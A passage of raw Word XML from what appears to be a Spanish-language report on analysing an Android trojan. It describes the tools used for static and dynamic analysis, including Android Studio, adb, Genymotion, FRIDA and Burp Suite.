      <w:r w:rsidR="00183598">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>informa de ello, además de proporcionar detalles respecto a la versión particular de la herramienta utilizada</w:t>
      </w:r>
      <w:r w:rsidR="009C65E2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para la compilación del proyecto</w:t>
      </w:r>
      <w:r w:rsidR="00183598">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D7218F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C65E2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En resumen, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">APKiD </w:t>
      </w:r>
      <w:r w:rsidR="00D7218F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>podría considerar</w:t>
      </w:r>
      <w:r w:rsidR="009C65E2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se</w:t>
      </w:r>
      <w:r w:rsidR="00D7218F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> una herramien</w:t>
      </w:r>
      <w:r w:rsidR="00D7218F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ta similar </w:t>
      </w:r>
      <w:r w:rsidR="009C65E2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">en cuanto a funcionalidad </w:t>
      </w:r>
      <w:r w:rsidR="00D7218F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a PEiD</w:t>
      </w:r>
      <w:r w:rsidR="005B0AC2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en Windows, pero</w:t>
      </w:r>
      <w:r w:rsidR="00D7218F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para la plataforma Android.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225A6A1A" w14:textId="150478B4" w:rsidR="00183598" w:rsidRDefault="00183598" w:rsidP="00183598">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A851E4" w14:textId="67974337" w:rsidR="00183598" w:rsidRDefault="000C1FC5" w:rsidP="00183598">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="6AF260C9">
          <v:shape id="Picture 17" o:spid="_x0000_s2084" type="#_x0000_t75" alt="A logo on a black square&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:171.5pt;margin-top:31.55pt;width:100.8pt;height:100.8pt;z-index:4;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28" o:title="A logo on a black square&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF21763" w14:textId="4C152251" w:rsidR="00C2368F" w:rsidRDefault="007307AD" w:rsidP="00914111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sublime Text</w:t>
      </w:r>
      <w:r w:rsidR="00C35B40">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: editor de texto </w:t>
      </w:r>
      <w:r w:rsidR="00D7485C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ligero que soporta el procesamiento y la visualización de una gran variedad de formatos. Utilizado principalmente en el proyecto para la toma de notas de carácter misceláneo </w:t>
      </w:r>
      <w:r w:rsidR="00FB0ED2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>con el fin de</w:t>
      </w:r>
      <w:r w:rsidR="00D7485C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> guiar </w:t>
      </w:r>
      <w:r w:rsidR="00FB0ED2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>los procesos de análisis</w:t>
      </w:r>
      <w:r w:rsidR="00D7485C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y permitir registrar </w:t>
      </w:r>
      <w:r w:rsidR="00FB0ED2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de manera rápida </w:t>
      </w:r>
      <w:r w:rsidR="001F75DC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>eventos o detalles que podrían ser de utilidad en el futuro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF58215" w14:textId="007E1B22" w:rsidR="001F75DC" w:rsidRDefault="001F75DC" w:rsidP="001F75DC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D12307F" w14:textId="00E3A146" w:rsidR="001F75DC" w:rsidRPr="00C2368F" w:rsidRDefault="000C1FC5" w:rsidP="001F75DC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="2BA3027C">
          <v:shape id="Picture 20" o:spid="_x0000_s2083" type="#_x0000_t75" alt="A blue and black device with a green bug on it&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:168.3pt;margin-top:22.4pt;width:99.7pt;height:99.7pt;z-index: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29" o:title="A blue and black device with a green bug on it&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B3620D" w14:textId="5ABEF868" w:rsidR="008B284C" w:rsidRDefault="00250473" w:rsidP="00914111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Android Studio</w:t>
      </w:r>
      <w:r w:rsidR="002F370B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: suite de desarrollo de aplicaciones Android proporcionada por Google. Además de servir para crear aplicaciones, también sirve para </w:t>
      </w:r>
      <w:r w:rsidR="00100876">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la depuración y el análisis de archivos APK. Cuenta con un sistema de emulación de dispositivos Android que también hace que esta herramienta sea utilizada </w:t>
      </w:r>
      <w:r w:rsidR="00BB2109">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>intensivamente en la fase de análisis dinámico. Al ser una herramienta de Google, está integrada totalmente en el ecosistema Android, y por lo tanto ofrece un gran abanico de opciones a la hora de emular dispositivos Android, permitiendo personalizar parámetros como ubicación, simulación de envío de mensajes SMS o simulación de ubicaciones GPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD7037B" w14:textId="4844C732" w:rsidR="003859E9" w:rsidRDefault="000C1FC5" w:rsidP="003859E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="7A0BC1EC">
          <v:shape id="Picture 21" o:spid="_x0000_s2082" type="#_x0000_t75" alt="A logo with colorful triangles&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated with medium confidence" style="position:absolute;margin-left:0;margin-top:37.2pt;width:81.95pt;height:81.95pt;z-index:6;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0" o:title="A logo with colorful triangles&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated with medium confidence"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63836FAB" w14:textId="679BC208" w:rsidR="00D86FCA" w:rsidRDefault="00D86FCA" w:rsidP="003859E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDDB4AE" w14:textId="2A691558" w:rsidR="00641820" w:rsidRDefault="00641820" w:rsidP="00914111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IntelliJ IDEA</w:t>
      </w:r>
      <w:r w:rsidR="003859E9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00FF735A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> entorno de desarrollo integrado orientado al trabajo con código Java y Kotlin. Es uno de los IDEs más populares debido a su gran número de opciones y </w:t>
      </w:r>
      <w:r w:rsidR="00B320BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rendimiento. En este proyecto se utiliza para la creación de programas auxiliares en Java que sirvan para tareas variadas del análisis, como la desencriptación de valores o la instrumentación de código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E87CB4" w14:textId="3E2AADF0" w:rsidR="00250473" w:rsidRDefault="00250473" w:rsidP="00914111">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AFD17EF" w14:textId="48CED7DA" w:rsidR="00250473" w:rsidRDefault="00250473" w:rsidP="00914111">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En lo relativo a la sección de a</w:t>
      </w:r>
      <w:r w:rsidR="008B284C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nálisis dinámico de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">l troyano, las herramientas utilizadas </w:t>
      </w:r>
      <w:r w:rsidR="00006A49">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para su realización </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fueron las siguientes:</w:t>
      </w:r>
      <w:r w:rsidR="008B284C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB9EB3" w14:textId="3CF4FD9C" w:rsidR="00250473" w:rsidRDefault="008B284C" w:rsidP="00914111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Android Studio</w:t>
      </w:r>
      <w:r w:rsidR="007E6A87">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: como se ha mencionado en la sección anterior, el emulador de Android Studio es una pieza muy importante en el análisis dinámico, ya que pese a que contiene algunas limitaciones respecto a otros como la falta de acceso superusuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C019CBB" w14:textId="77777777" w:rsidR="009C6CEA" w:rsidRDefault="009C6CEA" w:rsidP="008A0C24">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5195878E" w14:textId="3C3EB063" w:rsidR="008A0C24" w:rsidRDefault="000C1FC5" w:rsidP="008A0C24">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="5355D161">
          <v:shape id="Picture 24" o:spid="_x0000_s2081" type="#_x0000_t75" alt="A blue circle with a white logo&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:0;margin-top:37.85pt;width:85.75pt;height:85.75pt;z-index:7;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1" o:title="A blue circle with a white logo&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CBB6A7" w14:textId="224BB842" w:rsidR="008A0C24" w:rsidRDefault="008A0C24" w:rsidP="008A0C24">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3A92CA" w14:textId="134692C2" w:rsidR="002F370B" w:rsidRDefault="007E6A87" w:rsidP="00914111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="002F370B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C33102">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>parte de las herramientas de depuración de Android, permite la conexión de dispositivos Android (físicos o emulados) a los entornos de depuración elegidos. En este caso será utilizado para la conexión a los dispositivos emulados, con la finalidad de descargar y enviar archivos a estos, así como poder conectar consolas para realizar algunas fases del análisis como el Certificate Pinning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B132CD" w14:textId="38D783F3" w:rsidR="00166B50" w:rsidRDefault="00166B50" w:rsidP="00166B50">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5FF8A6" w14:textId="2EB43888" w:rsidR="00166B50" w:rsidRDefault="000C1FC5" w:rsidP="00166B50">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="1A117D53">
          <v:shape id="Picture 2" o:spid="_x0000_s2080" type="#_x0000_t75" alt="A hexagon with a white symbol&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:0;margin-top:34.6pt;width:135.55pt;height:90.35pt;z-index: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2" o:title="A hexagon with a white symbol&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D07595" w14:textId="02B4BF49" w:rsidR="008174A1" w:rsidRDefault="00250473" w:rsidP="00914111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5565C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Genymotion</w:t>
      </w:r>
      <w:r w:rsidR="00E55A3A" w:rsidRPr="00B5565C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B5565C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00B5565C" w:rsidRPr="00B5565C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lataforma de emulación de</w:t>
      </w:r>
      <w:r w:rsidR="00B5565C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> dispositivos Android</w:t>
      </w:r>
      <w:r w:rsidR="00006A49">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizada paralelamente a Android Studio para el análisis dinámico. En su versión gratuita las opciones son limitadas, pero permite la creación de dispositivos con permisos de superusuario, lo cual es importante para algunas de las operaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F69FAF" w14:textId="443B271D" w:rsidR="008C5C68" w:rsidRDefault="008C5C68" w:rsidP="008C5C68">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC5C41E" w14:textId="5D2B77A7" w:rsidR="00B844C8" w:rsidRDefault="000C1FC5" w:rsidP="008C5C68">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="7C97ED58">
          <v:shape id="Picture 3" o:spid="_x0000_s2079" type="#_x0000_t75" alt="A red background with white text&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:36.25pt;width:74.25pt;height:74.25pt;z-index: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3" o:title="A red background with white text&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8E780" w14:textId="6141531C" w:rsidR="00B844C8" w:rsidRPr="00B5565C" w:rsidRDefault="00B844C8" w:rsidP="008C5C68">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F336873" w14:textId="60CD2E61" w:rsidR="00250473" w:rsidRDefault="008B284C" w:rsidP="00914111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B454E5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FRIDA</w:t>
      </w:r>
      <w:r w:rsidR="008C5C68" w:rsidRPr="00B454E5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B454E5" w:rsidRPr="00B454E5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema de instrumentación dinámica que permite </w:t>
      </w:r>
      <w:r w:rsidR="00A01C0B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">entre otras funciones </w:t>
      </w:r>
      <w:r w:rsidR="00B454E5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el análisis </w:t>
      </w:r>
      <w:r w:rsidR="00AD221D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y depuración </w:t>
      </w:r>
      <w:r w:rsidR="00B454E5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de código Android en tiempo real a través de la inyección de código JavaScript. </w:t>
      </w:r>
      <w:r w:rsidR="00DD39A0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Est</w:t>
      </w:r>
      <w:r w:rsidR="00952AE9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a funcion</w:t>
      </w:r>
      <w:r w:rsidR="007227C4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00952AE9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lidad</w:t>
      </w:r>
      <w:r w:rsidR="00DD39A0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> facilita</w:t>
      </w:r>
      <w:r w:rsidR="00B454E5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la extracción de información mientras el malware se está ejecutando, así como la instrumentación para forzar caminos de ejecución determinados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1A089" w14:textId="77777777" w:rsidR="00B454E5" w:rsidRDefault="00B454E5" w:rsidP="003E4074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41601ABE" w14:textId="6ADBE4A4" w:rsidR="003E4074" w:rsidRDefault="000C1FC5" w:rsidP="003E4074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="772F6516">
          <v:shape id="Picture 5" o:spid="_x0000_s2078" type="#_x0000_t75" alt="A black and orange hexagon with a white lightning bolt&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:0;margin-top:30.05pt;width:68.9pt;height:68.9pt;z-index:10;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4" o:title="A black and orange hexagon with a white lightning bolt&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D123A" w14:textId="4ED57079" w:rsidR="00D7424D" w:rsidRPr="00B454E5" w:rsidRDefault="00D7424D" w:rsidP="003E4074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5B9CBE" w14:textId="44FE4CFA" w:rsidR="00B1279D" w:rsidRDefault="00250473" w:rsidP="00914111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E02BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="002E425F" w:rsidRPr="000E02BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000E02BD" w:rsidRPr="000E02BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>aplicación muy utilizada</w:t>
      </w:r>
      <w:r w:rsidR="000E02BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el entorno de la ciberseguridad para realizar análisis y tests de penetración. En este proyecto se utiliza su función de proxy </w:t>
      </w:r>
      <w:r w:rsidR="00FB123F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(opcionalmente </w:t>
      </w:r>
      <w:r w:rsidR="000E02BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>para el proceso de Certificate Pinning</w:t>
      </w:r>
      <w:r w:rsidR="00FB123F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el caso de realizarse)</w:t>
      </w:r>
      <w:r w:rsidR="000E02BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que permite el análisis de las peticiones </w:t>
      </w:r>
      <w:r w:rsidR="00525377">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">enviadas </w:t>
      </w:r>
      <w:r w:rsidR="000E02BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>entre el servidor de Command&amp;Control y el malware del dispositivo emulado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCB390" w14:textId="449AFA6D" w:rsidR="003203D5" w:rsidRDefault="000C1FC5" w:rsidP="003203D5">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
